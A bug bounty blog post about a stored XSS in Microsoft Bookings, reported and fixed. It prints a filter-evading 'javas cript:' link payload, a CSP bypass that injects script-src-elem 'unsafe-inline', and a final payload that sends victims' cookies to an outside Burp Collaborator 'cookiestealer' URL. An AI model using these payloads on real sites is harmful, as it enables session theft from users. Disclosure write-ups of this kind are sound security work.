Stored XSS vulnerability in Microsoft booking
This blog is regarding my finding on microsoft 365. One fine day I was working in my office and I received calendar invite from my colleague. While looking into email I found new (actually old but new for me) service booking by Microsoft. Microsoft booking allows anyone to book service / calendar slots. This application have two interfaces one which is internal and another public facing service page. I decided to check this application in depth. I went to internal booking page started new booking while booking service found one parameter message/notes. I tried to insert various XSS payloads to trigger xss but failed to.
On analysis, found application allows user to insert link or <a href> tag. Now my focus shifted this tag. I used google to find perfect payload for my attack vector and I found ancher tag can be exploited using href value. Application has various protection mechanism to prevent execution of script. But when I broke javascript word into javas cript application accepted this payload. Now when user click on link provided in booking message this payload will get executed. I was very much excited.
<a href="javas cript:alert('document.domain')">XSS</a> 
I was like wow that's great now lets hack it …!!
But when updated my payload to
<a href=”javas cript:alert(document.cookie)” >Testing.com </a>
I got pop with cookies undefined message that means application have csp protection.
So we updated our payload to bypass csp protection. The injection uses the script-src-elem directive in CSP. This directive allows you to target just script elements. Using this directive, you can overwrite existing script-src rules enabling you to inject unsafe-inline, which allows you to use inline scripts. ( https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-bypass) Thank’s to portswigger lab.
<a href=”javas cript:alert(document.cookie)”&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com </a>
and to my surprise I was able to get cookies using xss. Now I wanted to pass these cookies to my server. So I started burp collaborator and updated payload to
<a href=”javas cript:document.location=’http://l4q4dgmomxzkw6i13q5essmojfp6hu6.burpcollaborator.net/cookiestealer.php?c='+document.cookie"&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com </a>
Here I used document.location in a tag which redirect user on another page and share cookies.
Now I wanted to submit this bug but as I am authenticated user from same organization impact would have been low. So I tried same attack from service exposed to public and I was able to perform same attack without authentication.
Now as I am unauthenticated user/attacker severity went low/medium to high. I quickly submitted this bug to Microsoft team and guys at Microsoft was quick to fix this issue and yes they awarded me **** $ for this bug. Thank you Microsoft security team for great help during patching this issue.
This is my first bug bounty blog so If I have missed something you can ping me on twitter https://twitter.com/mrtechghost